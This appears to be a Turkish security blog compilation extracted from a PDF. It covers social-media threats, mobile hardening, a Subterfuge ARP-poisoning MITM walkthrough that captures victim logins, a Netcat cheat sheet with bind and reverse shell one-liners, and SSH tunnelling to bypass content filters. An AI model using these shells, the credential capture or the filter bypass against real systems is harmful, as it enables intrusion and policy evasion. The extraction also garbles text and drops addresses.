Kamuda Çalışanların Sosyal

Transkript

1 Kamuda Çalışanların Sosyal Medya Kullanımı İle Oluşabilecek Güvenlik Riskleri Sosyal ağlardaki saldırılar, ağın teknik altyapısından veya işleyiş sistemindeki zaaflardan kaynaklanır. Klasik siber saldırıların özelliği sosyal ağları da etkileyebiliyor olmasıdır. Modern siber saldırı türleri ise sosyal ağlara özel olarak geliştirilerek yine kullanıcı gizliliği ile güvenliğini hedef almaktadır. SOSYAL AĞLARDAKİ SALDIRI TÜRLERİ Klasik Sosyal Tehditleri Ağ TEKNİK SİBER Saldırı ve Malware (kötücül yazılımlar): Kullanıcıların her türlü kimlik veya erişim bilgilerini elde ederek, onlar hakkındaki özel ve hassas bilgileri izinsiz olarak toplamayı amaçlayan kötü niyetli programlardır. Sosyal ağlardaki malwareler ise ağın yapısı içinde kullanıcılar ve onların arkadaşları arasında yayılarak onlar hakkında detaylı bilgiler toplamaya çalışır veya kullanıcıların bilgisayarlarını birer zombi şekline dönüştürüp, bir botnet ağının parçası haline getirir. Ağlardaki bu şekilde çalışan ilk malware ise Koobface dir. Phishing (oltalama) ve spam saldırıları: Kullanıcıları sosyal mühendislikle kandırıp, sahte giriş sayfalarına

2 yönlendirerek ağına düşürdüğü kullanıcılar üzerinden sosyal ağdaki diğer kullanıcılara da yayılan bir sahtecilik ve aldatma saldırısıdır. Spam saldırılar ise oltaya düşmüş kullanıcılar üzerinden spam yayan saldırılardır. Sosyal spamlerin diğer spamlerden en önemli farkı, mesaj veya davetiye olarak görünmesidir. Spamlerdeki asıl adresler kısaltılmış URL adresleriyle gizlenir. CSRF (Cross-Site Request Forgery) Saldırıları: Tek tık saldırısı (one-click attack), oturuma binme (session riding) gibi anlamlara da gelebilen CSRF de saldırganlar sahte istekler (forge request) gönderir. Ama saldırganlar bunu kullanıcı üzerinden, yani onun ağ kimliği veya bu bilgilerin geçtiği tarayıcı ile gerçekleştirir. Tarayıcı güvenliğinin tam olmamasından kaynaklanır. XSS (Cross Site Scripting) Exploitleri: Genelde siteler ile uygulamaların kod yapılarının suistimali yoluyla yapılır. Saldırganların zararlı kodları var olan kodların içine saklayıp, uygulamanın çalıştırılmasıyla hedefe ulaşan bir saldırı türüdür. Facebook paylaşımlarına ve bağlantılarına bu şekilde enjekte edilerek kullanıcıya saldırılmaya ve ona ulaşılmaya çalışılmaktadır. Modern Sosyal Tehditleri Ağ Saldırı ve Clickjacking (tıklama sahteciliği): Likejacking adıyla da bilinen bu tehdit, özellikle Facebook un beğen düğmesi üzerindeki kodlarda yapılan oynamayla gerçekleştirilen bir zorla tıklama saldırısıdır. Bu saldırıda ağ kullanıcıları web de herhangi bir ögeyi veya sayfayı ya bilmeden ya da bilerek beğendikleri esnada aslında ilgisi olmayan bir şeyi işaretlemiş

3 olduğu ve hatta farklı bir bağlantıyı da tetiklediğinden birden çok tehdide maruz kalabilmektedir. Örneğin, bu saldırıda kullanıcıların bilgisayarındaki mikrofon ya da kameranın fark ettirmeden açılması gibi istenmeyen işlemler başlatılabilmektedir. Socware (social malware): Sosyal malware, arkadaşlar üzerinden gelen sahte ve muhtemelen zararlı mesajlardır. Bu tip mesajlarda kullanıcılar ödül, yarışma veya anket amaçlı bir Facebook uygulamasını indirmeye yönlendirilir. Bu tuzağa düşen kullanıcıların hesaplarına bulaşan sosyal malwareler hızlı bir şekilde kullanıcının profilinde onun adına mesajlar paylaşır. Socware ler bu şekilde daha fazla kullanıcıya yayılarak spam ya da kötücül link dağıtımını amaçlar. Typosquatting: Facebook gibi sosyal ağların web sitelerinin gerçek URL adresinin genellikle kullanıcıların dikkatsizliğinden ötürü facenook.com şeklinde yanlış yazımları sonucu kullanıcının sahte ve güvenlik açısından tehlike oluşturabilecek başka taklit adreslere yönlendirilmesi ile neticelenen bir web adresi sahteciliğidir. Yanlış adrese gidilmesinin ardından kullanıcılar genellikle bot ağları, phishing veya kötücül içerik ve uygulama yayan web sitelerine yönlendirilir ve hatta ağ giriş bilgilerini saldırganlara kaptırabilir. SOSYAL AĞLARDAKİ DİĞER SALDIRILAR Sosyal ağlarda teknik zaafları suistimal ya da teknik yöntemlerle gerçekleşmeyip daha ziyade insani zayıflıkları ve hataları kullanan saldırı türleri de mevcuttur. Bunlardan özellikle deneyimsiz ve bilinçsiz yetişkin ağ kullanıcıları zarar görmektedir. Bu saldırıların en başta geleni sosyal mühendisliktir. Sosyal mühendislik, karşı tarafın zaaflarından yararlanıp, ikna edici bir konuşma, etkileme, korkutma ya da

4 güvenebileceği kişilerin isimlerini referans olarak kullanma yoluyla gizli ve mahrem olabilecek her türlü bilgi, şifre ve bazı verilere ulaşma saldırısıdır. Özellikle Facebook ve Twitter sosyal mühendislik teknikleri kullanılarak bilgi edinmek için oldukça mümbit bir ortam sağlar. Bunların kullanımı ile kurum çalışanlarının karşılaşacakları sosyal mühendislik saldırıları, kurum ağında gerçekleşmesiyle kuruma dışarıdan sızma olasılığını arttırır. Kurum ağında sosyal medya kullanımı ile karşılaşılabilecek olumsuz faktörler; Kurum çalışanlarının hesapları üzerinden yaptıkları paylaşımlarda kurumdan ve çalışanlardan şikâyet etmeleri, kurumu kötülemeleri ve kurumun itibar kaybı, Kurum ağı kullanılarak kurum adına, suç teşkil edecek konuşmalar, yazışmalar vs. yapılması, Kurum ile ilgili proje ve toplantı detayları gibi özel bilgilerin yaygın olarak bilinen sosyal mecralarda (Facebook, Twitter, LinkedIn) paylaşılması, YouTube, Periscope gibi video ve yayın yapan sitelerde uzun süreli videoların izlenmesinin ve canlı yayınların yapılma durumunda kurum internetinin yavaşlaması, kurum çalışmalarını sekteye uğratması, Video yayın yapan sitelerde canlı yayın yapımına imkân verilen uygulamaların kullanılarak kurum içerisinde gizlilik ihlal edilmesi durumlarının oluşması, Video paylaşım yapan sitelerde verilen linklerin zararlı uygulamalar içermesi ihtimali ve bu linklere tıklanması ile kullanıcı bilgilerinin çalınması, Dropbox, Google Drive gibi dosya yükleme ve paylaşım siteleri üzerinden kuruma ait bilgilerin dışarı çıkartılması, Sosyal medyada, kurum adına paylaşılan iletilerde kurumun, farkında olmadan telif haklarının ihlal edilmesi, Sosyal medya kullanımında kullanılan platform ya da

5 uygulamada oluşabilecek açıklık ve zafiyetlerin neticesinde ya da oltalama (phishing) saldırılarına maruz kalındığında kurum ağına dışarıdan erişim sağlanması ya da kurum ağına zarar verilme imkânı, Sosyal medya üzerinden kurum ağı kullanılarak yapılacak paylaşımlarda ve yorumlarda siyaset, spor, din, terör, cinsellik, hakaret vs. paylaşım içeriklerinde bulunularak kurumun kanuni açıdan sıkıntıya sokulması, Tüm karşılaşılacak güvenlik riskleri bulundurulduğunda, kurum ağı kullanılarak göz önünde sosyal medya kullanımı sınırlandırılmalıdır. Bu yazıda -ta-yapilan-siber-saldirilar-ve-korunmanin-yollari adresindeki bilgilerden faydalanılmıştır. itunes Backup Nerede Saklanır? Dosyaları Apple cihazlarımızı bilgisayarımıza taktığımızda default (öntanımlı) olarak itunes açılır ve cihazımızın yedeğini alır. İşletim sistemine göre değişiklik gösteren saklanma dizinleri aşağıdaki gibidir: MacOS için; ~/Library/Application Support/MobileSync/Backup/ Windows için;

6 \Users\(username)\AppData\Roaming\Apple Computer\MobileSync\Backup\ dizinlerinden erişilebilir. Mobil Cihazlar İçin Güvenlik Kontrol Listesi Android Cihazlar İçin Güvenlik Adımları: Disk şifrelemeyi aktif edin. Cihaz kilidi için 4 karakterli PIN kodu yerine biyometrik şifreleri kullanın. Geliştirici erişimini devre dışı bırakın (Varsayılan olarak kapalı konumunda). 3. Taraflı uygulama mağazaları erişimini devre dışı bırakın (genellikle varsayılan kapalı konumunda). Uygulamalar ve araçlar kullanılarak geniş Android Permission lar sağlayan uygulamaları silin. Güncelleme geldiği zaman Android güncellemelerini yükleyin. Cihazınızın Android sürümünü son Android sürümü ile karşılaştırın. Cihazınız güncelleme alıyor mu? Eğer almıyorsa yeni bir cihaz almanızın zamanı gelmiş demektir. (Bu durum tabii ki zor, çünkü çoğu kullanıcı Android cihazları desteklenme yönünden başarısız buluyor, sık değiştirilmesi gerektiğini biliyor ve de bu da ios cihazlara göre daha maliyetli oluyor.). Yeni bir cihaz almadan önce araştırma yapın. Nexus, güvenlik güncellemeleri alma ve destekleme yönünden en

7 iyi dereceye sahip. Android Device Manager ı cihaz kaybolduğu takdirde bulunması için uzak konum servislerini açın. Android cihazınız bu özelliği desteklemiyorsa Find my Android aracını kullanın. Periyodik olarak network ayarlarınızı silin, eski bağlandığınız kablosuz ağları unutun. Kişisel bilgisayarınız dışında cihazınızı USB ile bir makinaya bağladığınızda Bu cihaza güven uyarısı çıkınca Hayır seçeneğini seçin. Güçlü bir Google şifresi oluşturun ve iki faktörlü doğrulama seçeneğini aktif edin. Eğer cihazı birden fazla kişi kullanıyorsa Misafir Modu seçeneğini aktif hale getirin. SD Card kullanıyorsanız Encrypt SD Card Storage özelliği ile SD kartınızı şifreleyin. ios Cihazlar İçin Güvenlik Adımları: Güncelleme çıktığında ios cihazınızın güncellendiğinden emin olun. Periyodik olarak network ayarlarınızı silin, eskiden bağlandığınız kablosuz ağları unutun. Kaybolmalara karşın Find my iphone özelliğinin açık olduğundan emin olun. 4 basamaklı PIN yerine uzun bir şifre kombinasyonuna sahip TouchID kullanın. Kişisel bilgisayarınız dışında cihazınızı USB ile bir makinaya bağladığınızda Bu cihaza güven uyarısı çıkınca Hayır seçeneğini seçin. Kendinizi güvenli şekilde olduğunuzdan emin olana kadar icloud u kapalı tutun. Tüm ayarlarınızı hem şifrelemek hem de korumak adına bir şifre yardımıyla yedeklemek için itunes kullanın. Güçlü bir Apple itunes şifresi kullanın. Ayarlar -> Gizlilik Ayarları kısmından gereksiz izin yetkisine sahip olan uygulamaların izin yetkilerini

8 kaldırın. Hem ios Hem de Android Cihazlar İçin Güvenlik Adımları: Kullandığınız zaman zarfı dışında Kablosuz bağlantıyı kapatın. Kablosuz bağlantı kuracağınız zamanlar için VPN kurun ve kablosuz bağlantılarda her zaman VPN kullanın. Ortak Wi-Fi ları kullanmayın, sadece güvendiğiniz Wi-Fi ağlarını kullanın. Cihazınızı cafe vb. yerlerde cüzdanınız gibi davranın. başıboş bırakmayın, Cihazınızı ödünç verirken ihtiyatlı davranın, verdiğiniz kişi aniden yetkisiz değişiklikler yapabilir. Kullanılmayan uygulamaları kaldırın. Cihazınızı servise götürmeden önce fabrika ayarlarına döndürün. Python ile Simple HTTP Server Kullanımı Bu yazımızda Python un yerleşik Web sunucusunun kullanımını göreceğiz.simplehttpserver modülü, Python da standart olan GET ve HEAD handlerlarını sağlayan basit bir HTTP sunucudur. Python Yerleşik Web sunucunun avantajı, herhangi birşey yüklemenize ve konfigüre etmenize ihtiyaç olmamasıdır. İhtiyacınız olan tek şey Python un yüklü olmasıdır.önemli olan tek şey, bu modülü tarayıcıdan erişmek istediğiniz dizinde çalıştırmanızın gerektiğidir. Örnek: 80 portunda bir HTTP Sunucu çalıştırmak istiyoruz

9 (varsayılan olarak port 8000 dir) #python -m SimpleHTTPServer 80 Enter a bastığınızda şu şekilde bir uyarı mesajı göreceksiniz. Serving HTTP on port 80 Artık dizindeki klasör ve dosyalara tarayıcınıza yazarak erişebilirsiniz.http sunucu çalıştığı terminalde Python Web sunucunuza yüklenen güncellenecektir. Subterfuge ile Middle Attack Man in müddetçe veriler The

10 Man in the middle saldırıları, saldırganın hedefindeki bilgisayarla diğer bilgisayar veya bilgisayarların ağdaki tüm veri trafiğini kendi üzerine alması yoluyla yaptığı saldırı tipidir.bu tür bir saldırıyı yapmak için temel düzeyde Layer 2 (Physical Layer) ve Layer 3 bilgisi yeterlidir. Layer 2, Data Link Katmanı olarak adlandırılır. Fiziksel adresleme bu katmanda yapılır. Layer 3, Network Katmanı, işte bu katman ip lerden oluşur, ip blokları ile tanımlanmış ağlar arasındaki veri iletişimi bu katmanda sağlanır. Layer 2 de çalışan switch mantığı; Switch herhangi bir porttan gelen bir ağ paketini alır. Aldığı paketin mac adresi anahtarın mac adres tablosu nda yoksa bunu mac adres tablosuna ekler. Aldığı paketin hedef mac adresini kendi mac adres tablosunda arar, eğer kendi mac adres tablosunda var ise bu paketi ilgili porttan gönderir. Eğer yoksa hiç bir şey yapmaz. (Drop edilir.) Not: Mac adres tablosu, mac adreslerini anahtarın portları ile ilişkilendirildiği tablodur. Bu tablo ile hangi mac adresine anahtarın hangi fiziksel hangi portundan ulaşılabildiğine bakılabilir. Bazen arp tablosu ile karıştırılabilir, arp tablosu mac adreslerinin ipler ile ilişkilendirildiği

11 tablodur. Mac Adres Tablosu 00:00:00:00:AA:AA FastEthernet 0/0 00:00:00:00:BB:BB FastEthernet 0/0 00:00:00:00:CC:CC FastEthernet 0/1 Arp Tablosu 00:00:00:00:AA:AA :00:00:00:BB:BB :00:00:00:CC:CC Peki örneğin ip li bilgisayar, ip li bir bilgisayar ile iletişimi geçmek isterse ne yapar? Layer 2 de bilgisayarlar birbirleri ile iletişime geçmek için mac adreslerini kullanırlar, IP ler ise Layer 3 te işimize yarar. Yani aynı ağdaki 2 bilgisayar iletişime geçmek için birbirlerinin mac adreslerini bilmek zorundadırlar. Sorunun cevabına gelince; ipli bilgisayar kendi arp tablosuna bakar, ipli bilgisayar arp tablosunda varsa arp time out süresi içinde zaten bu bilgisayar ile bir iletişime geçilmiş demektir. Eğer yok ise bu bilgisayar ile henüz bir görüşme sağlanmamış demektir yani bağlantı için ilk adıma geçilir. Bu da arp request broadcast paketini göndermekle başlar. Arp request paketi ağdaki tüm bilgisayarlara iletilir ve sorar kim? , bu arp sorusuna benim diye cevap verir ve bu cevabın içinde de kendi mac adresi vardır den gelen cevabı alan ipli bilgisayar artık ipli bilgisayarın mac adresini biliyor, yani onunla iletişime geçmek için yeterli bilgisi var. Göndermek istediği paketin kaynak mac adresine kendi mac adresini, hedef mac adresinin yerine ise ipli bilgisayarın mac adresini ekleyerek paketi gönderir. Tam bu

12 noktada eğer biz ü yanıltır ve nin mac adresi o değil bu diyerek kendi mac adresimizi yazarsak ne olur? Paket bize gönderilir. Peki, aynı paketi alıp ye biz göndersek ve yanıt bize gelse bizde aldığımız cevabı tekrar e gönderirsek ne olur? ün e gönderdiği tüm verileri kendi üzerimize almış oluruz ve eğer bu ağda internete çıkmak için kullanılan modem, router, proxy veya benzeri bir cihaz ise ün bütün internet faaliyetleri bizim kontrolümüz dahilinde gerçekleşir. Subterfuge ile MITM ın nasıl yapıldığını görelim > SETUP (Kurulum) Kali makinasında Subterfuge un en son sürümünü indiriyoruz; $ wget eb Komutu yazarak yükleme işlemi yapıyoruz; $ dpkg -i subterfuge_1.0-1_all.deb Subterfuge a bağlı olan şeyler var ise onları da update ediyoruz. $ apt-get update && apt-get -f install Subterfuge u çalıştırıyoruz. $ subterfuge

13 Sonra tarayıcımızdan e giderek Subterfuge arayüzüne ulaşıyoruz. Arayüzde Settings kısmına tıklıyoruz ve ekrandaki ayarlamaları yapıyoruz. Sonrasında MITM Vectors istediğimiz adresini yazıyoruz. sekmesine tıklayarak zehirlemek IP

14 Sonra Modules sekmesine tıklayarak Network View e tıklıyoruz ve Apply tuşuna basıyoruz. IP adresi olan kurban (victim) Linux makinayı görüyoruz. Burada Scan tuşu ile açık olan portları görebiliriz. Kontrol etmek istediğimiz saldırı türünüde istersek Controls kısmındaki simgelerden(http Injection,DoS Attack vs.) gerçekleştirebiliriz.kurban bilgisayardaki kişi eğer login olarak herhangi bir yere giriş yapıyor ise o bilgiler bizim elimize ulaşmış oluyor.

15 Siteye yaptığı girişin session bilgileri de elimize ulaşıyor. Mesela kurban bir siteye giriş yapsın. Ve bu bilgiler, log in tuşuna bastıktan sonra bizim Subterfuge ekranımıza düşmüş oluyor. Bu şekilde router ve kurban bilgisayar arasında MITM saldısını gerçekletirmiş oluyoruz. Netcat Kullanımı Bu doküman, Netcat in hem Linux hem de UNIX sistemlerdeki çeşitli kullanım şekillerinden bahsetmektedir. Temel Kullanım : Basit Netcat Istemci #nc [Hedef IP] [Port] Vermiş olduğunuz hedef IP nin yine vermiş olduğunuz porta bağlantı kurar. Basit Netcat Dinleyici #nc l p [localport]

16 Yerelde verdiğiniz portta Netcat dinleyici kurar. Netcat Komutları #nc [options] [Hedef IP Adresi] [port/lar] [Hedef IP Adresi] kısmı basit olarak karşı tarafın IP adresi ya da domain adıdır. -l : Listen mod ( dinleme modu ) (varsayılan olarak istemci moddadır) -L : Listen harder (yalnızca Netcat in Windows versiyonu için desteklidir. Bir istemci bağlantısı koptuktan sonra tekrar dinlemeyi otomatik başlatmak amacıyla Netcat e kalıcı bağlantı sağlar.) -u -p : UDP mod (varsayılan TCP) : Yerel port (Dinleme modunda bu port dinlenir, istemci modda porttur.) -e yarar. ise bütün paketlerin gönderildiği : Kurulan bağlantıdan sonra program çalıştırmaya n : DNS sorgusu yapmaması için kullanılır. -z : Zero I/O mod (Hiçbir very göndermez) -wn kaynak :Bağlantı timeout, STDIN kapandıktan sonra N saniye bekler.bir Netcat istemci veya dinleyici bu komut ile bağlantı kurması için N sn bekler. Eğer bu süre zarfında bağlantı gerçekleşmezse Netcat çalışmayı durdurur. -v :Ayrıntılı modu. Meydana gelen Standart Error hatayı ekrana yazdırır. -vv :Daha Ayrıntılı modu. Standart Error hakkında daha fazla ayrıntı yazdırır.

17 Netcat Windows Kullanımı : İstemci den Dinleyici ye Aktarım C: \> echo nc [Hedef IP] [Hedef Port] > deneme.bat C: \> nc l p [YerelPort] e deneme.bat YerelPort dan Hedef IP nin Hedef Portuna kurulan bağlantı ile paketler gönderilir. Dinleyici-Dinleyici Aktarım C: \> echo nc l p [YerelPort2] > deneme.bat C: \> nc l p [YerelPort1] e deneme.bat YerelPort1 de kurulan bir bağlantı ile YerelPort2 ye paket gönderimi şeklinde bir aktarım oluşturulur. İstemci-İstemci Aktarım C: \> echo nc [Sonraki IP] [Port 2] > deneme.bat C: \> nc [Önceki IP] [Port 1] -e deneme.bat Önceki IP nin Port 1 inden Sonraki IP nin Port 2 sine paket gönderimi ile aktarım olur. Dosya Transferi İstemciden Dinleyiciye Dosya Gönderme #nc l p [Yerel Port] > [giden dosya] Yerel Port dinlenir ve giden dosya çıktısı yüklenir. #nc w3 [Hedef IP] [Hedef Port] < [gelen dosya] gelen dosya Hedef IP nin Hedep portuna push edilir. Dinleyici den İstemci ye Dosya Çekmek #nc l p [Yerel Port] < [gelen dosya]

18 Yerel Port dinlenir ve gelen dosya push etmeye hazırlanır. #nc w3 [Hedef IP] [Hedef Port] > [giden dosya] Hedef IP nin Hedef Portu ile bağlantı kurulur ve giden dosya çekilir. TCP Port Tarayıcı IP Adresin Port Taraması #nc v n z w1 [Hedef IP] [Başlangıç portu]-[bitiş portu] Belirtilen port aralığında hedef IP ye n (isimleri çözmeden) z (herhangi bir data göndermeden) w1 Bağlantı kurmak için 1 sn den daha fazla beklemeden port taraması gerçekleştirme işlemine başlar. TCP Banner Grabber Linux IP adresine üzerinde çalışan TCP servislere Banner Grabbing #echo nc v n w1 [Hedef IP] [baş. port]- [bitiş Port] Backdoor Shell Linux da backdoor shell dinleme #nc l -p [Yerel Port] e /bin/bash Windows da backdoor shell dinleme C: \> nc l p [Yerel Port] e cmd.exe Tersine backdoor shell dinleme (Linux) # nc [Senin IP adresin] [port] e /bin/bash Tersine backdoor shell dinleme (Windows) C: \> nc [Senin IP adresin] [port] e cmd.exe

19 Sshuttle Kullanarak Poorman's VPN ile SSH Bağlantısı Kurma Sshuttle isimli program SSH bağlantısı üzerinden uzak sunucu ile bağlantı kurarak tüm trafiği kendi üzerinden çıkış yapmasını sağlıyor. Güvenli SSH bağlantısı üzerinden istenilen web sitesine çıkan trafik herhangi bir sahip olduğunuz yurt dışındaki sunucu üzerine aktarılır ve oradan çıkış yapılır. Kullanımı > Öncelikle; dosya dizinini yazıyoruz. Kullanıcı adı ve IP sini kullanarak sshuttle ı çalıştırıyoruz Ve bağlantı hazır > Transproxy başlatılıyor.

20 Herhangi bir bağlantı olup olmadığını kontrol etmek için nslookup kullanıyoruz. Ve DNS istekleri ve yanıtları görüyoruz.

21 HTTP Proxy Tunnel üzerinden SSH Vekil sunucu üzerinden kurum ağı dışarısında 443/TCP portu üzerinden hizmet veren SSH (Secure Shell) sunucusuna bağlantı sağlanmakta ve bu gerçekleştirilen bağlantı üzerinden içerik filtreleme sistemleri tarafından belirlenen internet erişim politikaları aşılabilmektedir. Bunun için aşağıda belirlenen komut girilmektedir. # ssh -D l kullanıcı_adı -p 443 Belirtilen komut ile SSH sunucu sistemine bağlantı gerçekleştirilmiş ve yerel kullanıcı bilgisayarında 8080/TCP portu üzerinde çalışmakta olan süreç başlamıştır. # netstat -nlput Aktif internet bağlantıları ( sadece sunucular ) Proto Recv-Q Send-Q Local Address Foreign Address State

22 PID/Program name tcp : :* LISTEN 2199/ssh Bu işlemin ardından kullanıcı tarafı tarayıcı yapılandırması aşağıdaki şekilde gerçekleştirilir > Bu adımların ardından internet tarayıcısı ile istenilen adreslere erişim SSH sunucu üzerinden gerçekleştirilmekte ve içerik filtreleme sistemi atlatılabilmektedir. SSH sunucu ile bağlantının zaman aşımı nedeniyle kopmaması için sunucu tarafındaki sshd_config dosyası içine > ClientAliveInterval 30 ClientAliveCountMax 4 İstemci tarafindaki ssh_config dosyasının içine de > ServerAliveInterval 30 ServerAliveCountMax 4 yazılmalıdır. Memory Forensics ve FTK

23 Imager Sabit diskler ve cihazların depolama kapasitesi ile birlikte, siber suçlar ve sızma vakaları sayılarının artması nedeniyle adli bilişim tekniklerinin genişletilmesi gerekliydi. Hali hazırda sabit disklerde depolanan statik verinin analizi ve toplanması şeklinde çalışsa da gelişmeler ile birlikte bilgisayar sistemlerinde bulunan zararlı faaliyetlerle ilgili kanıtların elde edilmesi hedeflenmektedir. Teknolojik kaynakların gelişimi ve İnternetin popüler olmasıyla birlikte, dijital saldırıların gelişmesi ve analiz edilen bilgi hacminin büyüklüğünden ötürü tek başına geleneksel yaklaşımı sürdürmek elverişsiz hale gelmiştir. Bu bağlamda, geçici bellekte saklanan verilerin analizi, yeni tekniklerle beraber soruşturma esnasında hassas bilgilerin kaybına neden olmaması için, kurulan bağlantıları, hatta erişim tuşlarını daha fazla şifrelemeli, çalışmakta olan süreçleri kontrol etmek gereklidir ki böylece adli bilişim sayesinde önemli verilerin kurtarılması sağlanabilsin. Bu bağlamda öncelikli olarak size Access to Data nın ücretsiz bir araç olarak kullanıma sunduğu FTK Imager adlı aracın kullanımını göstereceğim. Adım adım bir belleğin nasıl imajının alındığını birlikte görelim. FTK Imager

24 Physical Drive Daha sonra fiziksel makinamıza takılı halde bulunan USB aygıtımızı Physical Drive kısmından seçiyoruz. Select Drive

25 Burada Add Tuşuna basarak görmüş olduğumuz boşlukları doldurup imajın kaydedileceği yeri seçiyoruz. Sonrasında ise kaydedilecek imaja isim vererek Finish tuşuna basıyoruz.

26

27 Sürücü seçtikten başlatıyoruz. sonra da Start tuşuna basarak işlemi İmaj Özeti İmajın özeti işlem bittikten sonra.txt uzantısı halinde şekildeki gibi görülebilmektedir.

28 Network Hacking İçin Python Kullanımı CentOS DNS Kurulumu Kullanılan Bilgiler Sunucu ismi : dns.abc.com Sunucu ip si : /24 Gerekli paketleri yükleyelim; # yum -y install bind bind-libs bind-utils

29 Başlangıçta servisin otomatik çalışması için; # chkconfig -level 35 named on Servisin başlangıçta standart config dosyasını oluşturması için; # service named start Oluşturulmuş editlersek; olan config dosyasını aşağıdaki kod ile # vi /etc/named.conf Config Ayarları // // named.conf // // Provided by Red Hat bind package to configure the ISC BIND named(8) DNS // server as a caching only nameserver (as a localhost DNS resolver only). // // See /usr/share/doc/bind*/sample/ configuration files. for example named // options { directory /var/named ; dump-file /var/named/data/cache_dump.db ; statistics-file /var/named/data/named_stats.txt ; memstatistics-file /var/named/data/named_mem_stats.txt ;

30 recursion yes; dnssec-enable yes; dnssec-validation yes; dnssec-lookaside auto; /* Path to ISC DLV key */ bindkeys-file /etc/named.iscdlv.key ; }; logging { channel default_debug { file data/named.run ; severity dynamic; }; }; zone. IN { type hint; file named.ca ; }; zone abc.com { type master; file abc.com.fwd ; }; zone in-addr.arpa {

31 type master; file abc.com.rev ; }; include /etc/named.rfc1912.zones ; named.conf dosyasında isimleri girdiğimizde; cd /var/named # vi abc.com.fwd $ORIGIN abc.com. $TTL NS root.abc.com. (12 4h 1h 1w 1h) dns.abc.com. dns.abc.com. IN A www IN A # vi abc.com.rev $ORIGIN in-addr.arpa. $TTL 1h) SOA dns.abc.com. root.abc.com. (12 4h 1h IN NS dns.abc.com. 211 IN PTR dns.abc.com. Reset # service named restart

32 Test # cat /etc/resolve.conf search abc.com nameserver # nslookup Server: Address: #53 Name: Address: